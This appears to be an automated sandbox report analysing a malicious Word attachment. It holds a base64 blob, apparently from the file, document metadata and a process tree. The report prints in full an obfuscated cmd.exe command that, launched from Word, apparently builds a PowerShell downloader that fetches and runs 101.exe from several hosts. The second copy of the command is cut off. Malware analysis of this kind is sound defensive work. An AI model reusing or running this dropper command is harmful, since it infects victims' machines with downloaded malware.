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 TwBPAFAARQBOAAAAQAAAC/AEAAAAEjRWeD==
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentDocPrViewVal: print
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrDoNotSaveWebPagesAsSingleFile: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 00196407
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentBodySectPRsidRDefault: 00196407
WordDocumentBodySectPRRsidRPr: 004342A2
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictBinDataName: wordml://02000001.jpg
WordDocumentBodySectPRPictBinData: (Binary data 145376 bytes, use -b option to extract)
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://02000001.jpg
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrDocGridLine-pitch: 360
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
41
Monitored processes
10
Malicious processes
3
Suspicious processes
4

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 101.exe no specs 101.exe wabmetagen.exe no specs wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2956"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Untitled-attachment-01222019.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
4012c:\o4277\v3448\j5495\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set Qbq=D%rkjUNcIgeMCP'a=(/ u)B2~ELnb{zvYW5sf4i,6h3Sq}0-1\:.Tld+;9yxtFOwAJ7Gm@$X8op&&for %P in (74,73,63,1,13,5,22,26,8,12,50,24,34,39,48,1,2,1,43,25,43,43,8,62,6,6,64,11,25,50,24,47,37,39,48,1,41,1,52,25,11,13,50,24,47,42,39,48,1,53,53,19,70,74,23,48,66,42,16,14,7,72,46,66,48,14,56,70,44,48,57,72,16,27,10,63,47,73,28,4,10,7,60,19,6,10,60,51,33,10,28,12,53,38,10,27,60,56,70,15,66,23,46,42,16,14,41,60,60,74,50,18,18,54,20,15,27,68,38,30,20,3,38,74,15,2,3,51,7,73,68,18,42,4,54,37,41,48,44,38,63,69,41,60,60,74,50,18,18,27,15,60,38,73,27,15,53,38,54,10,15,51,38,27,36,73,18,65,32,42,44,9,31,52,52,69,41,60,60,74,50,18,18,28,38,30,27,10,35,51,2,38,35,10,47,20,74,51,27,35,3,51,2,20,18,13,28,3,52,66,65,22,68,69,41,60,60,74,50,18,18,42,37,51,23,42,57,51,57,34,51,72,46,18,32,42,40,71,35,34,13,35,68,69,41,60,60,74,50,18,18,68,15,38,53,51,41,73,60,9,38,2,53,35,9,15,68,10,35,51,59,58,30,18,5,73,60,38,62,68,10,14,51,43,74,53,38,60,17,14,69,14,21,56,70,30,72,37,34,48,16,14,60,57,34,37,57,14,56,70,41,42,40,23,57,19,16,19,14,48,46,48,14,56,70,4,57,42,34,46,16,14,30,37,34,66,48,14,56,70,44,40,40,34,42,16,70,10,27,31,50,60,10,68,74,55,14,49,14,55,70,41,42,40,23,57,55,14,51,10,59,10,14,56,36,73,2,10,15,7,41,17,70,73,66,37,48,46,19,38,27,19,70,15,66,23,46,42,21,29,60,2,58,29,70,44,48,57,72,51,0,73,63,27,53,73,15,54,61,38,53,10,17,70,73,66,37,48,46,39,19,70,44,40,40,34,42,21,56,70,68,34,46,37,23,16,14,44,40,48,57,23,14,56,8,36,19,17,17,67,10,60,47,8,60,10,68,19,70,44,40,40,34,42,21,51,53,10,27,9,60,41,19,47,9,10,19,37,46,46,46,46,21,19,29,8,27,31,73,3,10,47,8,60,10,68,19,70,44,40,40,34,42,56,70,63,40,37,40,66,16,14,28,23,66,66,40,14,56,28,2,10,15,3,56,45,45,7,15,60,7,41,29,45,45,70,28,37,34,46,40,16,14,68,57,48,23,46,14,56,79)do set eR7=!eR7!!Qbq:~%P,1!&&if %P equ 79 echo !eR7:*eR7!=!|cmd"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2572CmD /V:O/C"set Qbq=D%rkjUNcIgeMCP'a=(/ u)B2~ELnb{zvYW5sf4i,6h3Sq}0-1\:.Tld+;9yxtFOwAJ7Gm@$X8op&&for %P in (74,73,63,1,13,5,22,26,8,12,50,24,34,39,48,1,2,1,43,25,43,43,8,62,6,6,64,11,25,50,24,47,37,39,48,1,41,1,52,25,11,13,50,24,47,42,39,48,1,53,53,19,70,74,23,48,66,42,16,14,7,72,46,66,48,14,56,70,44,48,57,72,16,27,10,63,47,73,28,4,10,7,60,19,6,10,60,51,33,10,28,12,53,38,10,27,60,56,70,15,66,23,46,42,16,14,41,60,60,74,50,18,18,54,20,15,27,68,38,30,20,3,38,74,15,2,3,51,7,73,68,18,42,4,54,37,41,48,44,38,63,69,41,60,60,74,50,18,18,27,15,60,38,73,27,15,53,38,54,10,15,51,38,27,36,73,18,65,32,42,44,9,31,52,52,69,41,60,60,74,50,18,18,28,38,30,27,10,35,51,2,38,35,10,47,20,74,51,27,35,3,51,2,20,18,13,28,3,52,66,65,22,68,69,41,60,60,74,50,18,18,42,37,51,23,42,57,51,57,34,51,72,46,18,32,42,40,71,35,34,13,35,68,69,41,60,60,74,50,18,18,68,15,38,53,51,41,73,60,9,38,2,53,35,9,15,68,10,35,51,59,58,30,18,5,73,60,38,62,68,10,14,51,43,74,53,38,60,17,14,69,14,21,56,70,30,72,37,34,48,16,14,60,57,34,37,57,14,56,70,41,42,40,23,57,19,16,19,14,48,46,48,14,56,70,4,57,42,34,46,16,14,30,37,34,66,48,14,56,70,44,40,40,34,42,16,70,10,27,31,50,60,10,68,74,55,14,49,14,55,70,41,42,40,23,57,55,14,51,10,59,10,14,56,36,73,2,10,15,7,41,17,70,73,66,37,48,46,19,38,27,19,70,15,66,23,46,42,21,29,60,2,58,29,70,44,48,57,72,51,0,73,63,27,53,73,15,54,61,38,53,10,17,70,73,66,37,48,46,39,19,70,44,40,40,34,42,21,56,70,68,34,46,37,23,16,14,44,40,48,57,23,14,56,8,36,19,17,17,67,10,60,47,8,60,10,68,19,70,44,40,40,34,42,21,51,53,10,27,9,60,41,19,47,9,10,19,37,46,46,46,46,21,19,29,8,27,31,73,3,10,47,8,60,10,68,19,70,44,40,40,34,42,56,70,63,40,37,40,66,16,14,28,23,66,66,40,14,56,28,2,10,15,3,56,45,45,7,15,60,7,41,29,45,45,70,28,37,34,46,40,16,14,68,57,48,